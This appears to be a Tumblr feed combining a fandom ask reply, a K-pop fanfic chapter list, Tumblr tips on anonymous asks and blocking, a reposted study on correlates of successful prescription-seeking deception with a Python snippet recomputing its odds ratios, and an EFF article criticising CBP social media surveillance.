morexlapis · 6 months
What do you mean Hoyoverse supporters and defenders? /gen I didn’t think they did anything bad aside from making gacha games, I’m out of the loop. Also you post a lot of Hoyoverse characters I think, they’re Genshin Impact right?
It's self explanatory tbh, people who support & defend hoyoverse. They have a track history of racism (hi3 gi at least), orientalism (gi), ableism (tot, gi if you count glory), & possibly more but i'm not someone who keeps up with that. I just would rather people who defend & support that shit stay away.
I do, & most of them are genshin, yes. I hope this doesn't sound as aggressive as it looks to me, but I don't see how that's relevant?
parkjaysprada · 2 years
𝐅𝐄𝐕𝐄𝐑 ▸ park jongseong
PAIRING: park jongseong x fem!oc
SUMMARY: choi luna hated how everyone in her university adores and idolizes park jay, hybe university’s good-looking dance team captain. hence, she posted an anonymous rant about him on her twitter account. she didn’t know she’d be in the middle of chaos when her friend in belift international high school mentioned park jay’s twitter user on her said tweet.
GENRE: social media au, college au, fluff, oblivious!jay, oblivious!oc, one-sided enemies to friends to lovers (slight), romance, slow burn, wholesome, crack, and humor.
FEATURING: enhypen, le sserafim, mentions of tomorrow x together
WARNING: poor grammar, misspelled words, profanity, inappropriate jokes, mentions of food, self-doubt-ish, and my broken humor.
STATUS: completed
TAGLIST: closed!!
NOTE: keep in mind that the character portrayal of enhypen, le sserafim or any members of other groups that may appear or mention in this story does NOT reflect how they are in real life in any aspect as this book is written in pure FICTION.
a/n: hellooooo~ this is my first time posting on tumblr. also, i suck at making banners, so please bear with this smau’s banner. please do NOT expect too much about this fic. there’s a lot of filler chapters and just lame in general, i don’t want to disappoint y’all.
yes, le sserafim’s yunjin is my oc’s face claim because i love her with all my heart. stan enhypen & le sserafim everyone!
PROFILES: SUITE LIFE OF EUNCHAE & RIKI | JAY & HIS PROBLEMS
CHAPTERS:
001 ... be careful what you wish for ;)
002 ... i don’t know what just happened.
003 ... that was me being stupid
004 ... do you want us to get kicked in the ass?
005 ... oh, baby...
006 ... how can i change your mind?
007 ... i <3 u too
008 ... that cat is jay’s tail
009 ... can’t wait to meet that adorable young man
010 ... yeah, what Jay said
011 ... can’t say the same lol
012 ... when someone cooked better than you.
013 ... i know.
014 ... i love you already.
015 ... you think they can stop me
016 ... if i didn’t know you already, i’d say you like jay secretly
017 ... YOUR WHAT???
018 ... i’m telling Yeonjun.
019 ... make up your mind girl
020 ... YOU GUYS WENT OUT AND DIDN’T TOLD ME?!!!
021 ... 🦋
022 ... tf????
023 ... chill the f out
024 ... are you fr done with it though
025 ... bye everyone
026 ... yes. us too.
027 ... doctor strange
028 ... i will, don’t worry.
029 ... whatever guys.
030 ... no thx ❤️
031 ... ew not you
032 ... fr fr the audacity
033 ... jungwon is... jungwoning
034 ... kids these days really
035 ... i think i just died
036 ... not you too????
037 ... makes me barf
038 ... oh????
039 ... allkpop era
040 ... why so glum?
041 ... the end.
© parkjaysprada, 2022
tips · 2 years
PRI-003 Privacy Anon Off Or Anon On?
Turning on anon for messages is a big decision. By default, Tumblr doesn’t allow your blog to receive anonymous asks. You’ll have to enable anonymous asks manually. Before you decide to turn anon on or off, consider the pros and cons.
Pros:
People will feel less nervous about contacting you which leads to more messages.
Nice anons do exist.
An anon might turn into a mutual you can talk to regularly.
People who don’t have Tumblr can communicate with you.
Cons:
Anonymity makes it easier for people to send negative comments.
It’s a one-way conversation that can’t be followed up.
Spammers use anon to send unwanted messages.
While having anon on can lead to some unsavory conversations, you can block anons. To block an anonymous user, click the three little dots at the top of the message then “Block.”
[Screenshots: the Block option on desktop and on mobile]
Blocking an anon blocks the IP address the message came from, not just a blog: that address can no longer see your blog or message you. So if the person stays on the same wifi network but creates a different blog, or even switches devices, they still can’t contact you.
The downside is that the block is only as precise as the address. If their internet provider gives them a rotating IP address, they can still message you once it changes. And if you block someone who is using a public network (like a cafe or library), you may end up blocking everyone else who uses it.
🔒
mitarbeiter · 2 years
COM-003 Community Say Hello – Public or Completely Private
When you write messages on Tumblr, you decide for yourself how private or public they should be. And that can sometimes be just as important as the message itself. If you’re a bit shy, you might prefer to stay anonymous. If you want to connect with your followers, you can hold a public Q&A. These are the options available to you:
Super public
Asks (not anonymous): If you send an ask without enabling the "Ask anonymously" option, the person can answer it publicly on their blog. Everyone can see your blog name and your message.
Submissions (not anonymous): Works similarly to asks, but here you can ✨submit✨ something.
Public
Reblog with comment: If you reblog a post and add a comment, your followers can see it. Your blog name and your comment appear in the notes below the post.
Reply to a post: If you reply to a post, your blog name and your comment are shown. Replies, however, are only visible in the notes below the post.
🔒 Super private
Messages: Messages are fairly private, because only you and the user you are writing with can see them. But even here your blog name is displayed, and in theory someone could take screenshots.
Asks (anonymous): The holy grail of private messaging. If you enable the "Ask anonymously" option, your blog name is not shown in the message. Even people who don’t have Tumblr can ask questions anonymously.
The question is of course posted publicly, but YOU stay anonymous.
🤝
bluewatsons · 4 years
Amber N. Sanders et al., Deception and Drug Acquisition: Correlates of “Success” Among Drug-Seeking Patients, 7 J Primary Care & Comm Health 175 (2016)
Abstract
Purpose: Most research examining patient-based drug diversion neglects to assess physician deception directly. We attempt to determine if motives for deception are linked to success, and, similarly, if any health, demographic, or substance use history characteristics of the patients are predictive of being able to successfully deceive a physician.
Methods: Stratified random sampling was utilized to obtain a sample of 2349 young adults. Respondents completed a survey detailing their substance use histories and whether they had ever deceived a physician for medication. Ninety-three of these respondents reported attempting to deceive a physician for a medication and compose the analytic sample for the study.
Results: Of the 93 young adults who reported having attempted to deceive a physician for pharmaceuticals (4.0% of the general sample), 64 (68.8%) were successful. This included 24 only seeking medications for their own use, 9 only for financial purposes, and 31 with both motives. Respondents who reported recreationally using pharmaceuticals in the past were more likely to report successful attempts at obtaining a prescription compared with respondents without a history of abuse. With respect to demographic characteristics of the respondents, only race/ethnicity distinguished between successful attempts and failure.
Conclusions: Although a rare occurrence in the overall sample, significant correlates of successful deception did emerge. Respondents motivated to obtain a prescription in order to sell it to others were overwhelmingly likely to succeed in their pursuit to deceive as compared with respondents who sought prescriptions for their own abuse. Successful deceivers were also more likely to have been legitimately prescribed medication in the past. Successful respondents were more likely to be Caucasian than any other race/ethnicity.
Introduction
Prescription medication abuse, a practice both driving and facilitated by new and creative methods of drug diversion and acquisition, appears to be growing in the United States.1,2 While theft,3 fraud,4 unethical prescribing practices (ie, “pill mills”),5,6 and online outlets7 contribute to the issue, physicians must often determine whether a patient has a legitimate medical concern or is drug-seeking for the purpose of misuse, recreational use, and/or diversion. The technique of “doctor shopping,” broadly defined as attempting to obtain prescription drugs from multiple physicians or the exaggeration, or even complete feigning, of symptoms in order to acquire a prescription for which there is no legitimate medical need,3,8 appears to be widespread and a major concern of physicians.9
For physicians, attempting to identify those engaging in doctor shopping is a daunting task. Relatively healthy individuals may be efficient deceivers, well-versed in fabricating or inflating symptoms10 to obtain pharmaceuticals for themselves, to sell to others, or both. Those seeking care from additional providers for a single legitimate condition are challenging to identify in areas without an effective prescription drug monitoring program. Since it is difficult to determine if medication was previously prescribed in these areas, standard care could easily yield a second prescription.6 Current efforts to curb deception focus on physicians engaging in “patient selection” and being able to identify those who are deceptive in their account of pain and symptoms.9,10 However, such methods of selection create concern; suspicious physicians may undertreat patients generally and may specifically undertreat patients with either unusual presentations of legitimate issues or those with certain demographic or personality traits.6,9
Most research examining patient-based drug diversion neglects to assess physician deception directly. Many rely on case or cohort studies,11 retrospective self-reports of identified heavy users,12 or secondary analysis of records,13 and thus cannot give an accurate estimate of attempted deception in the general population nor detail the proportion of these individuals who are successful at obtaining medications. Stogner et al.14 describe the motives associated with attempting to deceive a physician among members of a university population, but only examined predictors of attempted deception. The present study seeks to detail what portion of those who attempted to deceive a physician in that data set were successful in obtaining the medication. More importantly, we attempt to determine if the motive for deception (financial or recreational use) is related to success, and, similarly, if any health, demographic, or substance use history characteristics of the patients are linked to being able to successfully deceive a physician.
Methods
An anonymous, voluntary self-report survey exploring substance use and high-risk behaviors was administered to students at a single large public university in the Southeastern United States (IRB #H12032). Courses were randomly selected from 2 strata (25 courses with 30-99 students and 15 courses with 100 or more enrolled students). Laboratory, online, physical education, and low-enrollment courses were not eligible for inclusion. A research assistant administered the pen and paper survey to each class. Students in multiple courses were asked to only complete the survey once. Respondents had access to campus health care, but likely utilized other practices for primary care, suggesting that an array of health care providers interacted with this group. Data collection within the forty courses yielded a final sample (response rate of 80.4%) of 2349 students (48.4% male, 68.9% white, 24.4% black, 2.8% Hispanic, and 4.0% other races) largely representative of the university’s undergraduate population (48.5% male, 65.5% white, 25.0% black, and 4.2% Hispanic).14-16 The sample yielded a higher prevalence of alcohol (87.8%) and marijuana (58.1%) than national level data (81.0% and 49.1% respectively as reported by Monitoring the Future17 in 2012).
Of the 2349 respondents, 93 (4.0%) reported attempting to deceive a physician for a medication.14 These respondents responded in the affirmative to at least 1 of 2 questions: “Have you ever attempted to get a prescription from a physician for a medication that you did not need and intended to sell?” and “Have you ever attempted to get a prescription from a physician for a medication that you did not need and intended to abuse?” As other items in the survey used the word “recreationally” when asking about pharmaceutical abuse, respondents would be unlikely to answer “yes” if they were self-diagnosing or modifying therapy to treat a malady. Forty-five of these had reported only being motivated for their own abuse (48.4% of attempted deceivers), 11 reported deception only for the purpose of selling the medication (11.8%), and 37 reported both motives (39.8%). Our analysis focuses only on these 93 respondents and evaluates potential factors linked to success at deceiving physicians among those attempting deception. Table 1 presents the number of individuals that were both successful and unsuccessful at deceiving a physician across demographic categories, substance use histories, motivation type, and legitimate medical histories. Odds ratios were calculated to indicate the magnitude of association while χ2 tests were used to determine whether these relationships were significant. Odds ratios were calculated as $\mathrm{OR} = \dfrac{\text{Group 1 deception successes} / \text{Group 1 deception failures}}{\text{Group 2 successes} / \text{Group 2 failures}}$, whereas the 95% confidence intervals were calculated as $e^{\ln(\mathrm{OR}) - 1.96\,\mathrm{SE}_{\ln(\mathrm{OR})}}$ to $e^{\ln(\mathrm{OR}) + 1.96\,\mathrm{SE}_{\ln(\mathrm{OR})}}$, where OR is the odds ratio and SE is the standard error.
Table 1. Success at Using Deception to Obtain a Prescription From a Physician.
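As an added worked example (not code from the paper), the odds-ratio and confidence-interval formula of the Methods section applied to the paper's own motive counts; the 2x2 cells are reconstructed from the 45/11/37 attempted and 24/9/31 successful figures in the text, and the P-values use a Pearson χ² test, which is the assumption made here about the test the authors ran.

```python
"""Odds ratios with Wald 95% confidence intervals and a Pearson chi-square
test for a 2x2 success/failure table, reproducing the motive comparisons
reported by Sanders et al. from the counts given in the paper's text.
"""
import math


def odds_ratio_ci(a, b, c, d, z=1.96):
    """Return (OR, lower, upper) for the table
        group 1: a successes, b failures
        group 2: c successes, d failures
    OR = (a/b) / (c/d); CI = exp(ln OR -/+ z*SE), SE = sqrt(1/a+1/b+1/c+1/d).
    """
    if min(a, b, c, d) <= 0:
        raise ValueError("the Wald interval needs every cell to be non-zero")
    or_ = (a / b) / (c / d)
    se = math.sqrt(1 / a + 1 / b + 1 / c + 1 / d)
    log_or = math.log(or_)
    return or_, math.exp(log_or - z * se), math.exp(log_or + z * se)


def chi_square_2x2(a, b, c, d):
    """Pearson chi-square statistic (no continuity correction) and its
    p-value for one degree of freedom."""
    n = a + b + c + d
    rows = (a + b, c + d)
    cols = (a + c, b + d)
    observed = ((a, b), (c, d))
    chi2 = 0.0
    for i in range(2):
        for j in range(2):
            expected = rows[i] * cols[j] / n
            chi2 += (observed[i][j] - expected) ** 2 / expected
    # With df = 1 the chi-square survival function is erfc(sqrt(chi2 / 2)).
    p = math.erfc(math.sqrt(chi2 / 2))
    return chi2, p


# Cells reconstructed from the paper: (successful, unsuccessful) per motive.
# Abuse-only: 45 attempted, 24 successful; sell-only: 11, 9; both: 37, 31.
ABUSE_ONLY = (24, 45 - 24)
SELL_ONLY = (9, 11 - 9)
BOTH = (31, 37 - 31)


def paper_comparisons():
    """The three motive comparisons from the Results section as
    (group1 successes, group1 failures, group2 successes, group2 failures)."""
    sell_or_both = (SELL_ONLY[0] + BOTH[0], SELL_ONLY[1] + BOTH[1])
    abuse_or_both = (ABUSE_ONLY[0] + BOTH[0], ABUSE_ONLY[1] + BOTH[1])
    not_both = (ABUSE_ONLY[0] + SELL_ONLY[0], ABUSE_ONLY[1] + SELL_ONLY[1])
    return {
        "sell_or_both_vs_abuse_only": (*sell_or_both, *ABUSE_ONLY),
        "abuse_or_both_vs_sell_only": (*abuse_or_both, *SELL_ONLY),
        "both_vs_not_both": (*BOTH, *not_both),
    }


if __name__ == "__main__":
    for name, cells in paper_comparisons().items():
        or_, lo, hi = odds_ratio_ci(*cells)
        chi2, p = chi_square_2x2(*cells)
        print(f"{name}: OR {or_:.3f}, 95% CI {lo:.2f}-{hi:.2f}, P = {p:.3f}")
```

Running it reproduces the paper's OR 4.375 (CI 1.68-11.41), OR 0.453 (CI 0.09-2.24) and OR 3.601 (CI 1.29-10.02); note that 9 + 31 successful sellers is 40, which is the count these figures require.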
Results
The 93 respondents who had attempted deception (58.7% male; 64.1% Caucasian) were asked whether they had ever been successful in obtaining a medication they did not need. More than two-thirds had been successful (64, 68.8%) including 31 with both motives, 24 only seeking medications for their own abuse (totaling 55 seeking medications for abuse), and 9 only for financial purposes (yielding 30 successful drug seekers intending to sell medications).
Respondents motivated to seek prescriptions for economic reasons were generally more likely to succeed than respondents only concerned with abuse. Respondents who reported being motivated by the desire for abuse or both for abuse and economic reasons had lower odds of successfully obtaining a prescription than respondents motivated by economic reasons alone. This difference, however, was not significant (OR 0.453, 95% CI 0.09-2.24, P = .322). Respondents who sought a prescription to sell, or, both to sell and to abuse, were found to have significantly greater odds of successfully obtaining a prescription than respondents motivated by only the desire for abuse (OR 4.375, 95% CI 1.68-11.41, P = .002). Respondents who reported both motives were significantly more likely to obtain a prescription than those who did not (OR 3.601, 95% CI 1.29-10.02, P = .011).
No differences in the odds of successful deception were found between respondents who reported a history of alcohol or marijuana use. However, successful deception was more likely among respondents who reported recreationally using pharmaceuticals in the past (OR 4.889, 95% CI 1.65-14.49, P = .003). Furthermore, respondents who reported being prescribed Adderall/Ritalin (OR 5.871, 95% CI 1.83-18.80, P = .001) or antidepressants (OR 13.186, 95% CI 1.68-103.77, P = .002) at some point in their lives were more likely to report successful deception compared to respondents who were never prescribed either of these medications. Respondents who reported poor health, were diagnosed with attention deficit/hyperactivity disorder, or were previously prescribed opioids were no more likely to actually obtain the sought prescription than respondents who did not report these.
With regard to demographic characteristics of the respondents, only race/ethnicity distinguished between successful attempts and failure. In particular, Caucasian respondents reported significantly more success than non-Caucasian respondents (OR 2.679, 95% CI 1.08-6.66, P = .031). Males, respondents from affluent families (earning >$100 000 per year), and self-identified LGBT individuals were no more or less likely to report successfully obtaining a prescription.
Discussion
Building off of previous research,14 which identified characteristics of patients who were likely to attempt “doctor shopping,” we explore patient characteristics that tended to correlate with successfully obtaining an unneeded prescription. Foremost, we find that respondents who had financial motives were overwhelmingly likely to report successful deception (83.3%) compared with respondents who sought prescriptions solely for abuse (53.3%). Although it is not possible to determine why these respondents were more successful, it is possible that their success may be linked to a high number of doctor deception attempts (as the survey only asked whether they were ever successful). As such, it would be beneficial for future research to investigate multiple dimensions of success, including frequency of both successful and failed attempts at doctor deception.
Furthermore, successful deceivers were also more likely to have been legitimately prescribed medications sometime in the past. This suggests that greater odds of success may be attributable to experiential knowledge making it easier to feign appropriate symptoms. Alternatively, past history of legitimate use might make physicians less cautious in prescribing. In either case, this finding suggests that the impact of effective, operational prescription drug monitoring programs could make a difference in a prescriber being able to detect which patients have been frequenting multiple physicians, receiving medication, and consequently which patients may be attempting to abuse or divert medication.
Our results show successful deceivers were more likely to be Caucasian than any other race/ethnicity. Furthermore, unlike attempting to deceive, success was neither related to gender nor sexual orientation. Thus, the traits associated with attempting deception identified within the previous study14 are not the same as traits linked to successful deception among those attempting deception. Overall, the findings of this study could possibly be attributed to some groups (non-Caucasians) being perceived as more suspicious by physicians and therefore given increased scrutiny. This may be problematic in that individuals equally or more deserving of scrutiny might be overlooked. This result further suggests a need to evaluate whether patients from marginalized groups are more frequently underprescribed or undertreated due to inappropriately heightened suspicions and discriminatory practices.
Additional research is also necessary to address some of the limitations associated with this study. First, it was not possible to determine the frequency of deception, the type of drugs sought, or the particular methods of deception. Being able to assess these features will likely aid physicians in identifying patients attempting to fraudulently obtain prescriptions. Second, like all self-report research, this study is vulnerable to the possibility of inaccurate or underreporting of deception due to social desirability on the part of respondents. Correlating patient data with self-report data to determine if a prescription was actually received might be one fruitful avenue for addressing this concern. Along the same lines, it cannot be determined with certainty that respondents were accurately reporting their intent to obtain prescriptions for abuse. Despite efforts to convey a focus on recreational use and not on self-treatment, it is possible that these were not mutually exclusive motivations. Given that a history of legitimate use was related to successful deception, it is not possible to determine if the original condition persisted at the time of attempted deception. Future studies should attempt to validate the extent to which respondents sought an unneeded prescription and their motives for doing so, since a profile of successful deception may vary on the basis of motivation. Third, given the apparent rarity of attempted deception (~4% in the current study), future studies based on general populations should attempt to obtain as large a sample as possible in order to obtain larger numbers of deceivers, which would also allow inferences to be extended beyond the university population. Finally, since physician characteristics likely play an important role in whether an attempt to deceive will be successful or not, future research should attempt to gather information on both the patient and the physician.
These limitations notwithstanding, this study investigates an important public health problem and concern for legitimate medical practitioners. Although the prevalence of attempted deception in this sample was relatively low, university students have high levels of substance abuse in general18,19 and specifically prescription drug abuse20,21 making them a well-suited population for an exploratory study such as this. This study was able to add to the literature by assessing factors associated with successful acquisition of prescription drugs in one population. Of direct relevance to clinicians, greater awareness of doctor shopping tactics, especially those that are successful, is needed. It is unlikely that the demand for prescription drugs (especially on college campuses) will decline—putting physicians at the front lines of pharmaceutical diversion and creating a need for greater awareness and vigilance of successful diversion tactics.
References
Johnston, LD, O’Malley, PM, Miech, RA, Bachman, JG, Schulenberg, JE. Monitoring the Future National Survey Results on Drug Use: 1975-2013: Overview, Key Findings on Adolescent Drug Use. Ann Arbor, MI: Institute for Social Research, The University of Michigan; 2014.
Substance Abuse and Mental Health Services Administration. Prescription drug misuse remains a top public health concern. http://www.samhsa.gov/newsroom/advisories/1301084404.aspx. Published January 8, 2013. Accessed May 1, 2014.
Inciardi, JA, Surratt, HL, Kurtz, SP, Cicero, TJ. Mechanisms of prescription drug diversion among drug-involved club-and street-based populations. Pain Med. 2007;8:171-183.
Singh, N, Fishman, S, Rich, B, Orlowski, A. Prescription opioid forgery: reporting to law enforcement and protection of medical information. Pain Med. 2013;14:792-798.
Rigg, KK, March, SJ, Inciardi, JA. Prescription drug abuse & diversion: role of the pain clinic. J Drug Issues. 2010;40:681-702.
Gugelmann, H, Perrone, J, Nelson, L. Windmills and pill mills: Can PDMPs tilt the prescription drug epidemic? J Med Toxicol. 2012;8:378-386.
Karberg, J. Progress in the challenge to regulate online pharmacies. J Law Health. 2010;23:113-142.
Wang, J, Christo, PJ. The influence of prescription monitoring programs on chronic pain management. Pain Physician. 2009;12:507-515.
Hurwitz, W. The challenge of prescription drug misuse: a review and commentary. Pain Med. 2005;6:152-161.
Jung, B, Reidenberg, MM. Physicians being deceived. Pain Med. 2007;8:433-437.
Cepeda, MS, Fife, D, Chow, W, Mastrogiovanni, G, Henderson, SC. Opioid shopping behavior: How often, how soon, which drugs, and what payment method. J Clin Pharmacol. 2013;53:112-117.
Fountain, J, Strang, J, Gossop, M, Farrel, M, Griffiths, P. Diversion of prescribed drugs by drug users in treatment: analysis of the UK market and new data from London. Addiction. 2000;95:393-406.
Grover, CA, Elder, JW, Close, RJ, Curry, SM. How frequently are “classic” drug-seeking behaviors used by drug-seeking patients in the emergency department? West J Emerg Med. 2012;13:416-421.
Stogner, JM, Sanders, A, Miller, BL. Deception for drugs: a demographic profile of “doctor shopping”. J Am Board Fam Med. 2014;27:583-593.
Stogner, JM, Miller, BL. A spicy kind of high: a profile of synthetic cannabinoid users. J Subst Use. 2014;19:199-205.
Agnich, LE, Stogner, JM, Miller, BL, Marcum, CD. Purple drank prevalence and characteristics of misusers of codeine cough syrup mixtures. Addict Behav. 2013;38:2445-2449.
Johnston, LD, O’Malley, PM, Bachman, JG, Schulenberg, JE. Monitoring the Future National Survey Results on Drug Use, 1975-2012. Volume II: College Students and Adults Ages 19-50. Ann Arbor, MI: Institute for Social Research, The University of Michigan; 2013.
Prendergast, ML. Substance use and abuse among college students: a review of recent literature. J Am Coll Health. 1994;43:99-113.
O’Grady, KE, Arria, AM, Fitzelle, DM, Wish, ED. Heavy drinking and polydrug use among college students. J Drug Issues. 2008;38:445-465.
Kolek, EA. Recreational prescription drug use among college students. NASPA J. 2009;46:519-539.
McCabe, SE, Knight, JR, Teter, CJ, Wechsler, H. Non-medical use of prescription stimulants among US college students: prevalence and correlates from a national survey. Addiction. 2005;100:96-106.
neptunecreek · 5 years
DEEP DIVE: CBP’s Social Media Surveillance Poses Risks to Free Speech and Privacy Rights
The U.S. Department of Homeland Security (DHS) and one of its component agencies, U.S. Customs and Border Protection (CBP), released a Privacy Impact Assessment [.pdf] on CBP’s practice of monitoring social media to enhance the agency’s “situational awareness.” As we’ve argued in relation to other government social media surveillance programs, this practice endangers the free speech and privacy rights of Americans.
“Situational Awareness”
The Privacy Impact Assessment (PIA) states that CBP searches public social media posts to bolster the agency’s “situational awareness”—which includes identifying “natural disasters, threats of violence, and other harmful events and activities” that may threaten the safety of CBP personnel or facilities, including ports of entry.
The PIA aims to inform the public of privacy and related free speech risks associated with CBP’s collection of personally identifiable information (PII) when monitoring social media. CBP claims it only collects PII associated with social media—including a person’s name, social media username, address or approximate location, and publicly available phone number, email address, or other contact information—when “there is an imminent threat of loss of life, serious bodily harm, or credible threats to facilities or systems.”
Why Now?
It is unclear why DHS and CBP released this PIA now, especially since both agencies have been engaging in social media surveillance, including for situational awareness, for several years.
The PIA cites authorizing policies DHS Directive No. 110-01 (June 8, 2012) [.pdf] and DHS Instruction 110-01-001 (June 8, 2012) [.pdf] as governing the use of social media by DHS and its component agencies (including CBP) for various “operational uses,” including situational awareness. The PIA also cites CBP Directive 5410-003, “Operational Use of Social Media” (Jan. 2, 2015), which does not appear to be public. EFF asked for the release of this document in a coalition letter sent to the DHS acting secretary in May.
Federal law requires government agencies to publish certain documents to facilitate public transparency and accountability related to the government’s collection and use of personal information. The E-Government Act of 2002 requires a PIA “before initiating a new collection of information that will be collected, maintained, or disseminated using information technology” and when the information is “in an identifiable form.” Additionally, the Privacy Act of 1974 requires federal agencies to publish Systems of Records Notices (SORNs) in the Federal Register when they seek to create new “systems of records” to collect and store personal information, allowing the public to comment.
This appears to be the first PIA that CBP has written related to social media monitoring. The PIA claims that the related SORN on social media monitoring for situational awareness is DHS/CBP-024 Intelligence Records System (CIRS) System of Records, 82 Fed. Reg. 44198 (Sept. 21, 2017). Given that DHS issued directives in 2012 and CBP issued a directive in 2015 around social media monitoring, this PIA comes seven years late. Moreover, there is no explanation as to why the SORN was published two years after CBP’s 2015 directive, nor why the present PIA was published two years after the SORN.
In March, CBP came under scrutiny for engaging in surveillance of activists, journalists, attorneys, and others at the U.S.-Mexico border, with evidence suggesting that their social media profiles had been reviewed by the government. DHS and CBP released this PIA only three weeks after that scandal broke.
Chilling Effect on Free Speech
CBP’s social media surveillance poses a risk to the free expression rights of social media users. The PIA claims that CBP is only monitoring public social media posts, and thus “[i]ndividuals retain the right and ability to refrain from making information public or, in most cases, to remove previously posted information from their respective social media accounts.”
While social media users retain control of their privacy settings, CBP’s policy chills free speech by causing people to self-censor—including curbing their public expression on the Internet for fear that CBP could collect their PII for discussing a topic of interest to CBP. Additionally, people running anonymous social media accounts might be afraid that PII collected could lead to their true identities being unmasked, even though the Supreme Court has long held that anonymous speech is protected by the First Amendment.
This chilling effect is exacerbated by the fact that CBP does not notify users when their PII is collected. CBP also may share information with other law enforcement agencies, which could result in immigration consequences or being added to a government watchlist. Finally, CBP’s definition of situational awareness is broad, and includes “information gathered from a variety of sources that, when communicated to emergency managers and decision makers, can form the basis for incident management decision making.”
We have seen this chilling effect play out in real life. Only three weeks before DHS and CBP released this PIA, NBC7 San Diego broke the story that CBP, along with other DHS agencies, created a secret database of 59 activists, journalists, and attorneys whom the government flagged for additional screening at the U.S. border because they were allegedly associated with the migrant caravan. Dossiers on certain individuals included pictures from social media and notations of designations such as “administrator” of a Facebook group providing support to the caravan, indicating that the government had surveilled their social media profiles.
As one lawyer stated, “It has a real chilling effect on people who might go down [to the border].” A journalist who was on the list of 59 individuals said the “increased scrutiny by border officials could have a chilling effect on freelance journalists covering the border.”
EFF joined a coalition letter to the DHS acting secretary about CBP’s secret dossiers. Several senators wrote a follow-up letter [.pdf]. In mid-May, CBP finally admitted to targeting journalists and others at the border, but justified its actions by claiming, without evidence, that journalists had “some level of participation in the violent incursion events.”
CBP’s Practices Don’t Mitigate Risks to Free Speech
The PIA claims that any negative impacts on free speech of social media surveillance are mitigated by both CBP policy and the Privacy Act’s prohibition on maintaining records of First Amendment activity. Yet, these supposed safeguards ultimately provide little protection.
First Amendment
The PIA emphasizes that CBP personnel are trained to “use a balancing test” to determine whether social media information presents a “credible threat”—as opposed to First Amendment-protected speech—and thus may be collected. According to the PIA, the balancing test involves gauging “the weight of a First Amendment claim, the severity of the threat, and the credibility of the threat.” However, this balancing test has no basis in constitutional law.
The Supreme Court has a long line of decisions that have established when speech rises to the level of a true threat or incitement to violence and is thus unprotected by the First Amendment.
In Watts v. United States (1969), the Supreme Court held that under the First Amendment only “true threats” may be punishable. The Court stated that alleged threats must be viewed in context, and noted that in the “political arena” in particular, language “is often vituperative, abusive, and inexact.” Thus, the Court further held that “political hyperbole” is not a true threat. In Elonis v. United States (2015), the Supreme Court held that an individual may not be criminally prosecuted for making a true threat based only on an objective test of negligence, i.e., whether a reasonable person would have understood the communication as a threat. Rather, the defendant’s subjective state of mind must be considered, including whether he intended to make a threat or knew that his statement would be viewed as a threat. (The Court left open whether a recklessness standard would also be sufficient for the speech to fall out of First Amendment protections.)
Additionally, in Brandenburg v. Ohio (1969), the Supreme Court held that “the constitutional guarantees of free speech and free press do not permit a State to forbid or proscribe advocacy of the use of force or of law violation except where such advocacy is directed to inciting or producing imminent lawless action and is likely to incite or produce such action.” There, the Court struck down an Ohio law that penalized individuals who advocated for violence to accomplish political reform, holding that the abstract advocacy of violence “is not the same as preparing a group for violent action and steeling it to such action.” In Hess v. Indiana (1973), the Court further clarified that speech that is mere “advocacy of illegal action at some indefinite future time,” is “not directed to any person or group of persons,” and is unsupported by evidence or rational inference that the speaker’s words were “intended to produce, and likely to produce, imminent disorder,” remains protected by the First Amendment. Similarly, the Court in NAACP v. Claiborne Hardware Co. (1982), held that “[a]n advocate must be free to stimulate his audience with spontaneous and emotional appeals for unity and action in a common cause. When such appeals do not incite lawless action, they must be regarded as protected speech.”
While the PIA states that CBP considers threatening posts to be those that “infer an intent, or incite others, to do physical harm or cause damage, injury, or destruction,” the PIA does not fully embrace the nuances of the Supreme Court’s jurisprudence—and CBP’s balancing test fails to comport with constitutional law. A seemingly threatening social media post may, in fact, be protected by the First Amendment if it is political hyperbole or other contextual facts suggest that the speaker did not intend to make a threat or did not believe that readers would view the post as a threat. Furthermore, a social media post that advocates for violence against CBP facilities or personnel may nevertheless be protected by the First Amendment if it is not directed at any particular person or group, and evidence does not reasonably indicate that the speaker intended to incite imminent violence or illegal action, or that imminent violence or illegal action is likely to result from the speech.
Thus, CBP may be collecting social media information and related PII even when the speech is protected by the First Amendment—contrary to its own policy—and further contributing to the chilling effect of CBP’s social media surveillance program.
Privacy Act
The PIA also mentions the Privacy Act, a federal law that establishes rules about what type of information the government can collect and keep about U.S. persons. In particular, the PIA points to 5 U.S.C. § 552a(e)(7), the prohibition against federal agencies maintaining records “describing how any individual exercises rights guaranteed by the First Amendment.”
Unfortunately, this prohibition is followed by an exception that effectively swallows the rule—that information about First Amendment activity may be collected if it is “pertinent to and within the scope of an authorized law enforcement activity.”
In Raimondo v. FBI, a Privacy Act case currently before the Ninth Circuit, the FBI kept surveillance files for “threat assessments” on two individuals who ran an antiwar website. EFF argued in an amicus brief against an expansive interpretation of the Privacy Act’s law enforcement activity exception in light of modern technology—specifically, given the ease with which law enforcement can collect, store, and share information about First Amendment activity on the internet, such information should not be stored “in government files in perpetuity when the record is not relevant to an active investigation.” We reminded the Ninth Circuit that in MacPherson v. I.R.S. (1986), the court recognized that “even ‘incidental’ surveillance and recording of innocent people exercising their First Amendment rights may have a ‘chilling effect’ on those rights that (e)(7) [of the Privacy Act] was intended to prohibit.”
Raimondo demonstrates the seemingly limitless nature of the law enforcement activity exception, including allowing for the indefinite retention of records of online activism and journalism, activity that is clearly protected by the First Amendment.
Similarly, under this PIA, because CBP follows a “credible threat” assessment not rooted in the First Amendment and the Privacy Act’s law enforcement activity exception can be interpreted broadly, CBP could very well collect and retain information that is protected by the First Amendment.
Unidentified Government Social Media Profiles Pose Risk to User Privacy
The PIA inspires little confidence not only in DHS and CBP’s interpretation of the law related to protected speech, but also in CBP personnel’s ability to follow the agencies’ own policies related to respecting social media users’ privacy.
The PIA states that CBP personnel “may conceal their identity when viewing social media for operational security purposes,” effectively allowing CBP agents to create fake accounts. However, this provision conflicts with DHS’s 2012 directive, which requires employees to “[u]se online screen names or identities that indicate an official DHS affiliation and use DHS email addresses to open accounts used when engaging in social media in the performance of their duties.”
Moreover, if, as the PIA states, CBP personnel do not engage with other social media users and may only monitor “publicly available, open source social media,” this raises the question: why would a CBP agent need to create a fake account? Public posts or information are equally available to all social media users on a platform. Why would CBP personnel need to conceal their identity before viewing a publicly available post if they are not attempting to engage with a user?
